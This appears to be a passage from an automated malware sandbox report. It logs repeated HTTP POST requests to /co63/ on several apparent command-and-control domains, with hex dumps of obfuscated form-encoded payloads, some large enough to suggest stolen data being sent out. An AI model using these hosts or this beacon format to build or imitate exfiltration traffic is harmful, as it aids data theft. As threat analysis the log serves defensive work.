30 34 5a 71 77 6a 32 43 7a 6c 35 56 62 4b 41 34 7a 61 6a 53 39 44 4e 69 62 59 47 64 72 4e 5f 28 6d 66 6b 4e 37 59 65 55 71 36 75 75 77 72 5a 41 43 48 62 58 44 58 41 4f 2d 65 74 66 37 74 56 57 70 76 42 53 46 37 6d 76 62 6f 61 43 67 6c 43 30 73 7a 68 72 68 50 5f 68 58 57 46 64 50 62 48 58 63 66 66 66 50 48 32 39 51 59 42 6a 71 56 33 36 51 30 68 5a 44 46 51 59 62 4b 6b 45 47 56 69 54 2d 5a 30 4e 54 4e 31 38 58 4c 4d 31 5a 57 63 4f 68 7e 76 42 4f 6f 73 39 2d 56 63 37 61 77 75 64 6f 76 54 65 4d 38 58 62 39 79 79 51 57 55 51 6f 65 53 64 44 5f 77 38 53 30 58 43 67 43 73 36 77 2d 68 69 46 6e 28 5f 74 64 68 75 4d 58 37 6f 73 45 73 38 55 4f 45 58 65 54 76 35 53 55 75 34 79 6a 4d 4a 53 44 49 37 73 35 5a 52 67 30 36 31 6b 72 35 70 6b 71 44 69 61 6a 5a 41 67 77 77 6d 49 65 7e 75 68 56 75 52 4e 57 54 69 33 78 42 77 63 4d 49
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.myccsmartmove.comConnection: closeContent-Length: 1484Cache-Control: no-cacheOrigin: http://www.myccsmartmove.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.myccsmartmove.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 45 2d 7e 72 68 57 48 51 69 70 63 2d 32 73 6b 6a 38 39 55 6f 6b 77 74 6e 56 6a 57 54 31 43 54 58 39 57 37 56 6a 52 54 31 37 4d 61 63 66 59 54 68 4b 42 75 39 30 49 63 38 36 49 49 4f 62 61 33 71 6b 78 54 68 72 6c 47 63 5a 4c 7a 51 76 77 57 53 68 62 46 34 4a 54 6c 30 62 62 6e 72 7a 6d 41 56 35 70 4b 6f 53 56 76 6b 31 7a 59 6c 6c 59 4c 73 52 56 79 71 4e 72 48 78 4c 4b 31 61 6c 4d 43 57 42 39 45 37 32 42 77 42 4c 58 44 4c 6d 33 78 34 41 44 38 6f 71 73 68 79 59 56 64 6e 49 56 4b 41 65 30 71 44 76 61 4d 31 6d 56 6e 4d 38 46 51 36 4d 30 56 49 67 75 4c 78 28 52 4b 34 4f 45 6c 37 53 6e 49 54 62 70 46 54 65 6e 66 4c 63 49 55 77 69 32 50 33 59 4a 79 51 4e 34 64 34 53 41 67 63 79 62 4c 66 78 5a 7e 73 5a 35 7e 6a 4e 50 44 6b 33 51 4e 6e 36 43 53 72 46 37 35 4b 6e 78 41 72 56 62 75 37 79 63 54 57 6e 76 55 56 6a 52 7e 4f 6e 5a 35 73 75 36 79 68 66 76 6f 53 41 57 52 65 76 59 52 5f 56 39 6e 57 35 72 6c 30 38 47 6c 6b 6c 70 58 6f 54 64 43 69 6d 54 46 39 79 6e 43 77 4a 36 64 68 50 69 50 4a 42 74 71 33 75 7a 45 37 49 78 35 72 35 65 36 38 53 69 37 42 4f 53 57 4b 31 51 51 67 31 77 4e 47 33 2d 61 73 5a 52 44 73 5a 65 30 31 55 58 30 57 37 4f 50 4f 33 72 4a 79 32 44 57 65 64 6b 63 6d 32 77 6d 69 7a 62 74 6f 31 67 31 50 74 67 4f 77 34 71 61 74 47 64 65 4d 32 45 57 48 73 75 39 46 6b 43 69 64 35 54 34 75 46 33 41 6e 4e 72 77 67 63 58 73 79 72 75 54 46 64 46 71 63 31 77 69 33 4a 65 6c 39 62 79 49 43 72 33 56 36 30 4a 4b 2d 41 75 74 36 41 5a 50 31 35 65 69 59 6f 46 4f 70 72 65 4b 48 63 37 50 38 42 62 56 53 32 36 28 72 38 44 39 66 43 4a 7e 4e 31 54 70 54 54 47 43 61 66 67 57 69 35 62 46 5f 71 59 38 32 72 72 74 4f 55 76 74 37 47 30 39 32 67 5f 6f 64 4e 47 49 4c 63 39 76 75 71 58 69 4a 37 52 54 70 32 38 4c 4e 77 30 50 74 78 6d 6a 79 36 79 64 77 28 75 39 64 45 37 31 51 77 30 5a 43 67 32 72 6d 48 42 6a 36 4c 66 37 33 54 35 77 57 6c 4e 52 37 5a 7a 38 56 4c 32 4b 4e 59 2d 37 78 64 51 68 6b 58 2d 30 50 72 56 68 70 66 4e 50 46 4b 45 37 6e 51 38 4a 59 54 35 33 4e 55 57 7e 33 37 4f 76 79 77 4c 73 56 6b 36 30 5a 6c 37 4a 62 65 2d 7a 66 58 72 6f 64 32 6b 6b 34 55 37 6e 4e 53 4d 47 76 54 39 59 32 4a 61 77 53 7a 70 45 78 6e 54 69 35 56 53 48 4c 34 72 4b 4d 64 30 66 68 55 64 75 72 69 66 59 50 42 67 47 4f 46 6f 28 4d 33 58 59 66 7a 4b 4f 39 55 72 50 36 38 48 30 6a 61 36 50 42 6d 66 67 75 28 5f 4b 36 7e 65 6d 53 55 78 53 59 43 73 50 78 53 63 31 59 73 31 63 39 4d 75 49 78 62 44 78 67 47 30 4f 36 6b 4e 31 4d 6c 31 57 31 6d 52 70 71 7e 32 6c 50 58 52 6a 65 4c 37 35 66 78 6e 75 4c 28 66 46 4f 47 73 57 79 73 64 4a 43 59 48 7e 69 67 77 4f 4f 7e 58 30 2d 6c 35 5a 6a 6c 57 5
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.myccsmartmove.comConnection: closeContent-Length: 151296Cache-Control: no-cacheOrigin: http://www.myccsmartmove.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.myccsmartmove.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 45 2d 7e 72 68 55 6e 63 78 4a 5a 79 79 75 78 45 6f 76 63 67 67 68 63 6f 65 45 76 54 34 79 61 6c 77 68 75 32 6a 52 6a 78 75 5a 47 4f 59 37 4c 68 64 54 48 30 36 49 63 37 34 49 49 4e 52 4b 36 64 34 79 53 75 72 6b 79 32 5a 4c 72 66 67 79 76 35 77 65 52 56 46 6a 59 50 54 36 43 72 33 6a 4d 57 35 4c 33 71 56 55 6e 6b 78 48 52 6a 70 71 54 33 58 68 43 6d 58 72 62 7a 45 72 64 54 79 50 6d 6a 44 66 49 5f 38 68 51 35 4a 6e 4c 63 6f 32 77 56 43 6c 68 6e 6e 34 4a 31 54 32 68 68 49 32 7e 79 53 52 4b 68 7a 4b 45 41 36 42 7a 53 7e 54 63 79 4d 31 52 31 70 4f 61 46 30 32 65 54 41 56 56 72 41 55 45 54 65 61 56 44 47 56 48 4a 5a 50 41 6f 68 6c 32 50 50 4b 36 31 64 73 52 37 63 7a 5a 55 31 59 76 50 28 63 47 66 62 37 65 6e 48 39 62 59 36 51 4a 75 7a 33 61 57 49 63 6c 45 6e 67 63 32 5a 35 37 34 74 4e 28 74 6c 63 59 42 73 67 65 79 72 61 31 53 76 4b 43 48 59 73 4a 45 4f 6c 6f 59 73 62 6f 69 49 74 72 36 37 72 74 34 6c 33 6c 63 6c 70 54 61 54 39 33 62 28 54 46 37 32 6b 32 66 4a 37 35 68 50 69 28 5a 42 59 32 33 75 53 31 68 4f 33 4e 75 32 2d 37 6b 52 79 72 57 45 41 79 42 31 51 67 76 31 41 46 47 6c 73 7e 73 4f 67 7a 72 4b 4f 30 31 4e 48 30 44 37 4f 50 47 33 72 49 6b 32 42 32 53 63 67 45 6d 69 44 79 61 79 75 78 6d 6b 44 70 6e 7a 51 4f 73 30 4c 62 70 4c 39 44 6a 32 44 7a 42 73 4f 5a 46 6c 57 61 65 38 79 49 71 44 6d 41 34 55 61 45 77 57 33 30 59 72 75 76 32 61 30 36 36 78 52 4f 6d 4f 65 6c 36 4f 53 55 56 76 79 35 63 67 4c 53 74 43 6f 73 66 54 64 66 54 35 2d 32 44 6f 69 4b 74 71 5a 69 54 58 66 76 4b 4b 49 35 47 6d 34 6e 63 34 43 51 4b 64 4e 75 63 30 7a 39 6c 55 6d 7a 6a 64 68 75 6f 35 74 67 71 74 35 35 33 6d 4b 67 70 4d 5f 41 67 51 6c 4e 5a 69 2d 67 77 43 79 49 6c 58 65 48 36 76 33 75 65 74 54 58 6c 7a 64 69 4c 32 47 44 6a 33 48 7a 7a 28 42 74 33 6d 75 52 49 46 37 35 50 68 6c 46 39 69 47 7e 78 44 33 50 4f 4e 5f 58 45 62 59 5a 7a 75 49 73 6f 50 6b 45 6f 59 33 57 67 52 36 33 70 66 41 38 43 46 64 73 36 76 77 68 41 55 4d 4b 69 66 52 47 6d 66 5f 5a 42 41 34 50 73 59 48 58 64 68 74 6a 6e 79 49 45 6f 31 36 41 67 69 2d 46 75 64 62 48 4f 45 65 67 6f 67 32 5a 65 4d 5f 65 51 49 4c 6d 66 54 65 38 49 59 59 35 43 70 62 6f 77 6f 54 47 43 51 77 48 57 39 49 33 30 4e 33 7a 64 62 50 79 51 67 6f 30 2d 49 51 57 56 46 66 54 70 33 58 67 44 7a 36 76 36 47 65 28 36 34 41 55 67 5a 5a 58 46 71 50 67 75 31 76 4b 69 77 2d 72 77 55 7a 75 59 42 70 50 78 48 5a 6c 57 73 31 63 6a 45 4b 49 56 62 7a 78 6e 48 78 69 5f 6b 4e 56 30 6c 33 37 39 33 68 55 58 70 42 42 49 64 68 6a 53 4e 35 42 59 78 6c 72 39 28 66 42 64 4d 50 7e 4e 74 74 41 56 53 58 7e 69 6d 79 43 67 31 44 51 37 67 2d 59 6b 73 57
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.takealicense.comConnection: closeContent-Length: 1484Cache-Control: no-cacheOrigin: http://www.takealicense.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.takealicense.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 4b 66 71 6a 65 49 61 54 72 78 73 72 68 44 4f 75 76 2d 32 4f 61 70 5a 7a 67 6f 33 36 71 48 6a 66 4d 57 63 42 77 5f 36 69 71 4b 4c 56 6f 61 38 6e 69 78 28 47 28 70 51 47 6a 38 49 76 75 41 59 62 59 51 64 45 78 54 52 66 55 4b 39 55 62 33 44 64 71 67 63 4e 39 38 62 70 79 6f 30 62 35 59 4c 38 72 31 34 59 33 78 45 43 79 6c 54 62 47 75 28 37 6b 58 78 34 59 4c 76 4c 64 4e 45 38 6c 47 61 30 4b 47 6a 50 79 32 78 6b 46 4c 79 4a 5a 48 4b 4c 6b 6f 77 70 33 31 77 6d 4c 71 6c 6a 62 70 45 76 49 53 6c 43 62 69 71 76 73 30 6a 4a 50 52 37 59 69 32 52 5f 46 55 76 72 6f 49 61 5a 56 49 59 47 39 49 37 71 47 7a 74 30 33 6c 79 4f 41 71 36 73 55 6f 35 75 56 65 57 55 30 74 42 57 6d 43 31 6b 6d 4e 4a 41 52 4c 58 68 75 47 64 63 4e 37 6e 4f 48 53 7a 43 66 32 7e 59 56 54 37 47 5a 34 7e 68 6b 2d 4d 69 70 65 56 4c 67 33 7e 67 37 6c 6c 68 7e 61 46 75 44 6b 64 46 66 4e 48 53 42 43 33 63 42 59 68 74 4c 64 46 79 76 33 4a 59 6f 56 43 67 31 46 78 57 6b 70 32 4c 51 65 4c 64 61 72 62 73 79 5f 48 38 64 62 51 6d 64 44 57 77 72 59 7a 4b 49 71 4a 6d 58 4b 79 46 72 65 79 36 62 43 42 73 76 38 74 48 37 66 43 65 6c 39 28 30 35 54 57 34 58 45 46 47 58 63 58 71 4b 54 71 71 33 66 31 49 6c 69 6b 48 45 38 79 61 35 54 64 4c 35 44 6a 4d 47 33 30 38 61 53 71 73 72 46 63 53 51 63 46 73 71 56 38 45 64 37 30 49 78 56 75 30 41 37 45 45 75 6b 70 34 30 53 77 46 4c 32 54 4e 66 59 6c 34 39 65 38 63 71 41 47 46 36 6c 59 71 79 78 62 72 50 2d 46 39 62 4f 46 4e 77 67 78 38 4e 67 33 57 47 35 34 49 42 32 66 47 73 49 50 33 65 67 6b 76 28 74 4d 39 78 49 72 69 4e 44 5a 62 30 61 71 65 43 50 4c 77 4a 6d 48 77 48 30 48 5f 52 66 74 30 6c 6a 64 54 4b 46 59 57 32 55 50 2d 65 58 70 4e 64 7a 68 4b 39 35 67 46 45 64 52 66 7a 64 53 51 58 38 69 36 79 4a 6d 30 4f 78 46 47 4a 41 75 55 74 6a 54 36 49 4e 63 6e 61 42 56 69 77 64 6d 31 32 6b 76 42 7a 68 63 32 6a 77 7a 70 70 50 6e 49 31 51 67 76 79 75 53 34 55 6a 7a 59 65 44 64 54 44 50 6e 36 78 38 64 56 35 52 30 67 78 30 44 32 79 4a 54 64 73 6f 38 75 6c 4a 35 62 6c 4c 4e 4f 73 32 77 63 63 77 38 6f 72 68 78 63 4d 36 51 49 35 71 6e 74 46 4a 54 52 43 47 36 4f 66 65 35 73 50 68 65 73 50 5f 30 55 70 4c 73 79 71 52 79 68 48 51 63 63 73 69 75 6e 70 77 28 7a 76 39 4c 43 47 53 6a 4a 52 64 33 31 28 47 43 39 31 6b 4d 6f 49 6d 46 51 4a 53 52 76 4c 65 28 32 74 48 56 35 49 57 75 4e 63 46 51 54 4e 35 55 4e 52 33 44 70 79 50 73 53 6f 63 62 49 57 6f 66 66 61 5a 36 32 7e 61 31 7a 50 56 42 5a 47 69 52 35 35 45 74 52 62 5a 54 49 6d 48 36 63 44 32 43 71 62 4f 54 66 44 56 79 4a 45 66 69 6a 52 38 38 35 4f 4b 61 37 33 4c 4d 43 36 42 36 34 42 35 67 37 41 79 32 41 4d 74 30 59 6e 4c 66 5
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.takealicense.comConnection: closeContent-Length: 151296Cache-Control: no-cacheOrigin: http://www.takealicense.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.takealicense.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 4b 66 71 6a 65 4a 54 67 74 42 6f 36 6c 42 71 56 6f 4d 7e 47 65 35 4a 68 6f 50 4f 39 6a 31 44 77 53 52 70 67 77 5f 6d 6d 28 62 36 4d 73 35 6b 6e 71 54 58 46 72 35 51 46 71 63 4a 35 34 41 55 6a 47 7a 64 4d 78 53 6b 34 55 4c 70 58 50 44 6e 55 7e 32 67 61 6c 38 58 56 76 59 67 65 39 64 58 37 72 54 70 48 38 54 6b 43 33 51 48 5a 49 63 57 6e 33 43 42 38 48 5f 50 4a 57 6f 35 79 71 52 6d 38 4d 6c 50 4c 7a 79 70 41 55 62 36 57 58 46 69 7a 6d 4b 67 31 35 6c 30 6c 53 64 45 6f 62 4b 68 55 4c 51 42 73 66 53 79 47 68 51 33 50 5a 7a 44 2d 69 33 55 46 64 46 66 53 77 62 71 69 59 5a 6f 38 32 72 58 71 46 48 67 5f 76 57 4b 4d 64 64 48 70 57 2d 78 39 54 75 6d 78 7a 6f 46 52 6f 79 56 70 6c 4c 56 51 63 4f 75 58 68 6b 74 49 55 35 28 6d 47 79 33 7a 45 47 4f 35 65 44 43 4f 5a 6f 44 31 6e 37 6c 76 6e 62 74 5a 7a 68 53 57 77 55 45 42 35 35 70 32 44 55 73 53 50 64 28 56 65 43 57 31 43 65 64 39 45 64 49 71 74 33 41 5a 69 33 71 79 31 46 39 65 6b 4f 66 77 66 2d 4c 54 58 4a 50 44 79 38 33 38 64 61 68 37 61 69 47 77 72 5f 44 6a 4f 73 56 74 53 4b 7a 43 69 75 6a 73 52 52 6c 5a 76 38 39 54 37 76 61 65 6b 37 58 30 7e 7a 6d 5f 52 45 46 47 4d 4d 58 6f 4b 54 71 69 33 66 30 6b 6c 67 55 54 46 38 36 61 70 69 68 4e 34 31 28 61 58 52 39 50 55 53 71 77 73 45 64 50 55 63 5a 41 71 55 6b 6d 65 62 59 49 77 55 4b 7a 46 61 55 49 35 6d 42 37 36 7a 46 64 46 57 62 64 66 59 35 68 76 4b 77 71 74 68 71 32 37 6c 59 31 39 52 47 78 59 4d 74 58 59 73 64 65 35 48 4e 48 65 67 6a 76 42 5a 73 78 42 55 66 4b 74 4c 72 6a 53 45 31 55 35 66 67 4c 31 36 7a 5f 4a 43 46 44 70 59 75 6c 44 76 33 67 63 54 6a 49 42 32 48 31 52 71 70 59 6b 43 70 48 43 6b 55 70 35 33 4c 73 49 6d 34 56 51 69 5a 72 38 6f 45 52 4b 5f 70 4c 33 39 57 4c 53 36 6a 6c 35 49 76 79 45 6a 70 45 66 79 57 56 73 52 6a 33 41 5a 55 2d 5a 42 59 38 30 64 4b 4b 33 51 4f 6d 34 44 6c 48 37 41 75 66 72 4c 72 71 75 46 63 78 31 4a 7a 4b 54 79 28 35 51 43 46 31 41 66 4c 4a 32 50 6c 57 77 53 41 5a 35 31 62 4b 7e 4e 44 4c 68 76 38 64 7a 4d 56 78 6f 61 30 74 34 32 56 34 52 58 63 77 36 42 73 30 50 34 42 69 36 50 53 5a 43 72 33 77 48 6b 48 30 58 75 74 4f 46 79 4b 63 50 5a 31 42 76 5a 55 4c 67 52 57 6b 59 41 35 6b 71 45 71 6d 71 54 44 38 74 75 6e 58 4a 44 62 69 59 4b 37 45 67 48 79 31 31 7a 6f 46 49 6d 64 4d 4a 42 5a 5f 4b 62 58 32 6e 6b 4e 36 49 78 53 4a 63 31 51 54 59 70 55 6a 63 58 47 35 79 4e 51 53 70 5a 72 49 65 36 7a 64 61 5a 36 6f 35 61 78 54 50 6c 42 75 42 6a 4e 36 35 45 4e 74 62 66 4c 79 6e 48 75 69 49 58 61 72 65 65 54 62 51 77 4f 45 45 61 44 56 52 38 34 71 58 37 72 70 33 37 31 6e 6a 42 36 34 4a 61 4d 72 4c 6a 6e 4b 4c 75 49 63 34 61 28
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.naspewt.xyzConnection: closeContent-Length: 1484Cache-Control: no-cacheOrigin: http://www.naspewt.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.naspewt.xyz/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 7a 58 4b 4e 7e 6e 75 73 57 6c 52 6c 76 68 31 65 76 41 61 62 57 61 77 4f 39 63 33 46 4d 46 64 35 4a 71 77 33 6c 6d 74 5a 33 79 41 30 45 6c 42 72 47 34 4c 39 54 4c 32 36 37 54 32 35 4f 73 69 66 6f 76 6f 45 65 52 62 73 46 36 75 61 37 53 4e 33 4b 38 59 53 32 69 6a 62 58 57 6a 47 5a 35 41 65 35 46 57 65 64 31 4a 68 36 38 36 64 59 43 79 79 33 6b 45 2d 70 58 46 37 68 63 76 35 71 49 4b 52 44 71 4e 6c 54 35 74 4d 63 68 55 39 62 76 78 30 52 38 44 34 7e 67 36 6c 59 4c 76 38 79 69 62 31 76 4f 73 66 44 6b 71 71 7e 70 56 41 41 43 7a 36 43 69 67 43 6a 48 63 74 38 4d 32 38 31 56 74 31 65 4a 7e 44 4d 55 4b 77 72 65 5a 56 51 74 6d 61 67 58 4f 62 4a 42 6d 4b 51 66 4e 4b 77 6c 74 56 36 51 66 37 4a 47 5a 45 6a 64 62 36 68 6a 63 53 70 58 4f 5f 79 63 6d 37 59 66 46 75 67 69 45 4b 68 6c 38 43 4d 75 63 62 57 6a 44 61 62 47 6f 53 44 59 4c 78 52 32 53 67 33 42 74 58 58 47 49 74 5a 31 69 54 71 39 4b 63 4f 49 4d 35 73 71 44 66 5a 34 6a 6f 73 61 6d 61 28 6e 4c 75 51 73 77 67 53 53 30 6a 6e 30 59 4d 35 4e 65 4a 30 49 4d 6e 28 4c 32 77 57 74 72 57 32 46 77 74 45 78 6b 4a 5a 4e 53 5a 58 4e 58 73 34 67 73 67 45 57 6b 39 63 6a 53 78 33 4a 4b 49 76 67 4d 47 72 37 71 2d 74 37 32 49 53 2d 43 4c 4d 5f 69 6b 73 57 4f 58 33 4a 53 4a 54 46 7e 78 37 74 37 64 47 74 72 61 4f 61 28 50 5a 6f 36 53 64 50 44 38 4d 53 6d 50 6a 4e 49 46 7a 31 59 35 35 41 31 4e 49 4c 39 4f 72 2d 32 38 58 35 43 49 4f 33 72 5f 50 78 57 48 56 4a 39 6e 74 73 6b 44 46 6d 4e 5a 49 67 69 77 49 4d 6c 69 77 6a 57 61 36 2d 31 35 4b 79 33 52 49 33 59 49 78 36 4f 30 6e 45 30 77 62 45 28 54 4c 38 57 72 5a 67 63 69 4c 74 47 31 6b 57 4b 35 75 78 41 51 6b 37 70 5f 33 50 63 65 6b 43 69 7a 44 53 51 4f 69 66 78 71 7a 57 7e 30 4e 73 6c 50 41 58 6d 73 59 54 74 6f 46 35 43 5f 44 6d 64 71 70 62 58 30 73 46 41 38 67 4f 32 67 43 6a 73 58 35 37 6a 59 36 45 57 36 48 78 56 35 31 34 48 68 65 47 34 6f 46 73 65 68 37 34 30 50 55 4f 34 44 51 37 6c 2d 66 49 74 4d 70 53 65 48 71 4b 6d 63 46 7a 55 4b 30 48 79 46 66 43 6f 51 61 6b 35 49 62 57 44 4a 6b 6b 6a 4e 4d 37 49 49 66 31 65 69 35 6b 64 4b 30 57 6e 7a 54 6d 45 43 78 39 5a 5f 77 78 34 6d 4b 78 38 54 31 66 4c 36 63 78 59 53 4b 77 58 64 62 4d 55 50 76 63 47 53 78 32 6f 53 6c 78 47 46 4d 65 42 75 7e 51 75 72 6e 6d 57 66 61 68 55 43 4f 4b 54 6a 63 43 5a 54 4d 37 48 72 42 6d 54 77 57 6d 46 4a 65 6a 45 33 37 5f 73 70 39 6b 55 44 50 30 53 35 4e 57 52 30 30 71 42 69 68 59 7a 31 35 4a 79 31 4c 48 77 33 6d 4e 53 61 4a 77 39 79 54 6a 35 6d 4f 33 35 70 5a 38 67 49 67 4a 66 6c 43 52 73 75 57 73 79 61 42 78 66 51 4e 54 68 68 7e 6f 6c 62 5a 54 4e 49 46 6a 36 4b 66 76 6d 46 48 76 46 66 71 49 58 42 7
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.naspewt.xyzConnection: closeContent-Length: 151296Cache-Control: no-cacheOrigin: http://www.naspewt.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.naspewt.xyz/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 7a 58 4b 4e 7e 6a 7a 66 54 56 6c 30 35 54 42 66 69 53 6a 57 53 37 41 51 31 2d 79 48 42 7a 30 4a 58 4b 52 63 6c 6e 39 46 72 33 6b 63 42 46 52 72 50 62 79 37 64 4c 32 31 39 54 32 2d 59 64 65 6e 68 5a 49 4d 65 51 76 4b 46 36 6d 46 31 54 38 5f 64 4f 78 51 30 79 76 4a 4c 69 4b 46 49 76 4d 52 35 6e 71 4a 57 55 42 68 31 73 4f 66 57 78 4b 6c 30 51 55 69 6d 58 4a 39 71 35 62 4b 67 66 65 38 43 4a 68 68 61 63 68 67 4c 41 63 32 56 75 77 54 51 66 6a 38 77 77 7e 6d 53 73 6e 36 78 44 47 4d 28 66 73 48 4e 41 47 44 78 34 68 47 4c 78 72 4d 43 67 4d 72 35 33 74 52 79 75 57 74 34 44 41 4f 61 4a 4b 44 4e 6c 44 72 67 35 74 54 63 4e 48 48 6a 45 57 70 50 77 32 6a 58 61 68 4a 75 6c 4e 57 30 79 48 72 52 47 78 52 68 63 54 4d 34 45 35 6c 71 33 4b 4b 31 39 57 61 43 73 30 32 67 52 42 4d 6d 6a 73 4b 53 38 5a 7a 56 52 50 73 51 33 4a 6c 54 4a 50 35 51 47 6a 4e 39 69 39 57 5a 79 38 6d 55 58 61 44 6c 38 32 76 44 6f 56 34 6d 4f 76 72 5a 34 76 67 73 36 53 38 7a 48 4b 6c 64 4e 52 69 53 53 73 6a 6e 77 51 63 37 34 75 4a 31 74 4a 72 35 4e 4b 7a 49 39 71 49 6f 6b 64 6c 44 43 41 57 5a 4e 69 4e 58 39 66 73 35 6a 49 67 42 32 30 79 51 44 53 78 68 35 4b 47 76 67 4d 65 72 37 71 62 74 35 47 55 54 2d 4b 4c 4f 36 7e 71 74 67 44 35 78 62 4f 48 63 46 7e 31 32 4d 37 39 4e 4d 48 69 4f 64 53 4b 5a 4a 57 53 63 4d 50 7a 65 47 36 4c 72 38 49 61 37 55 41 70 67 77 38 41 49 4c 78 58 71 38 50 58 53 63 36 64 50 33 72 38 41 6c 33 62 48 34 38 6d 75 4f 38 63 4a 46 74 49 50 45 44 34 49 73 68 78 77 41 71 65 35 34 74 74 66 69 6a 72 4e 46 30 55 39 71 28 55 6a 43 41 34 55 56 54 42 61 73 43 37 49 31 30 7a 61 4f 6d 5f 6b 6c 69 6a 6a 30 67 36 70 65 73 50 28 73 5a 47 68 44 53 63 49 44 59 7a 67 4c 35 45 71 67 36 61 4a 38 70 63 45 6b 44 33 63 78 4d 75 52 36 75 48 54 58 74 72 68 49 6e 76 6b 56 63 70 68 4f 37 77 56 33 64 76 72 62 33 36 78 52 4c 4c 4b 33 78 61 7a 36 58 44 58 43 70 46 41 50 36 51 74 50 46 5a 5a 4c 55 4c 5a 4b 5a 64 4a 75 77 30 28 68 36 71 68 4f 76 37 49 7a 6c 4a 36 41 36 41 62 54 51 68 56 30 42 71 50 79 43 66 69 6a 33 47 66 37 38 35 50 6b 37 4b 30 6d 63 38 77 31 69 5a 5a 6b 35 36 28 4e 39 64 36 6a 74 42 4c 57 49 39 6b 35 48 48 45 44 30 54 56 41 36 34 58 4f 55 4f 74 2d 36 37 79 6e 39 6e 68 47 33 54 4e 70 6c 50 7a 6b 79 6a 6e 30 4f 32 61 69 30 4f 4e 37 7a 7a 4f 51 39 54 47 63 54 6f 42 46 72 73 56 57 46 4a 4c 7a 45 56 28 5f 51 4d 39 69 63 44 49 78 71 35 4d 6b 39 32 30 71 42 38 33 49 33 52 35 35 79 64 46 6d 4d 79 6d 4f 61 49 4a 79 52 32 53 67 74 59 59 41 31 71 54 4d 67 4d 69 63 7a 69 43 51 52 57 57 73 7e 46 55 67 75 49 4e 6a 70 4c 30 34 6c 62 66 52 68 59 50 48 66 43 4b 63 61 42 63 72 77 58 6e 49 62 54
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.mattewigs.comConnection: closeContent-Length: 1484Cache-Control: no-cacheOrigin: http://www.mattewigs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mattewigs.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 28 69 75 78 41 6a 33 79 75 6d 7a 48 4e 61 35 48 7a 69 66 68 32 79 37 4d 64 37 52 65 71 42 6c 37 66 73 6f 30 31 79 71 69 4c 32 28 42 6e 67 74 43 59 35 39 4c 54 6d 76 54 46 35 56 62 6f 30 33 31 54 54 56 4a 28 72 6e 35 56 36 77 70 4d 74 28 47 31 58 44 48 53 50 57 69 57 75 6f 76 76 54 52 5a 4c 47 64 4d 4d 37 78 61 49 72 41 6d 52 50 37 79 74 76 31 55 73 4a 74 65 5a 4e 38 79 41 42 47 4f 5a 46 68 35 6f 2d 34 78 31 6d 76 30 65 50 43 59 43 66 39 61 4a 75 30 7a 67 6a 67 77 4c 6c 4e 66 45 39 32 6a 42 4e 41 41 6f 69 63 61 35 4c 5a 48 6b 6c 69 78 70 49 50 52 75 74 43 59 77 54 65 57 30 57 46 77 50 30 49 5f 6b 79 39 4f 30 4b 6a 5a 79 69 6d 57 6e 4e 49 5a 58 7a 6d 56 4b 43 7a 62 5a 4f 4f 55 58 43 52 6e 72 6b 33 48 36 54 46 2d 62 6e 50 52 65 34 45 69 4b 33 52 41 67 58 57 46 77 42 67 5f 78 39 68 6e 6d 4d 7e 79 48 4e 7a 69 36 4c 61 4e 4a 4a 44 5a 48 4c 54 46 47 79 34 77 57 31 77 4f 66 31 4f 4d 4c 7a 56 32 70 4d 57 62 6c 4d 7a 77 61 58 33 4d 47 69 63 32 51 47 52 63 68 6b 66 4a 33 42 59 34 70 4f 79 75 6b 59 43 72 31 7a 39 44 56 35 70 50 65 43 71 6e 4c 7a 44 2d 75 51 28 35 6f 44 61 4f 53 71 75 70 50 64 52 4d 58 39 6d 48 65 34 53 4c 72 41 33 65 4c 32 47 64 67 6f 6b 57 49 59 79 64 51 4d 33 5f 5a 45 48 77 66 77 59 58 4d 48 65 42 79 57 53 4a 6d 65 65 4f 67 34 64 78 68 48 76 2d 53 2d 36 38 54 39 55 52 7e 48 4d 7a 56 70 77 30 6e 73 78 76 33 70 37 53 51 6a 48 44 4a 46 44 32 6b 45 56 50 41 49 67 69 66 46 64 34 41 45 48 55 7e 75 74 5a 71 41 39 52 6e 48 68 49 61 68 62 57 45 6e 28 68 62 62 72 4e 45 68 6d 6a 56 63 68 66 39 55 43 33 56 71 45 50 37 53 48 31 4a 34 75 43 69 36 43 73 38 4f 57 5a 4f 79 50 32 4a 75 58 57 43 74 54 79 45 33 7a 4c 6c 5f 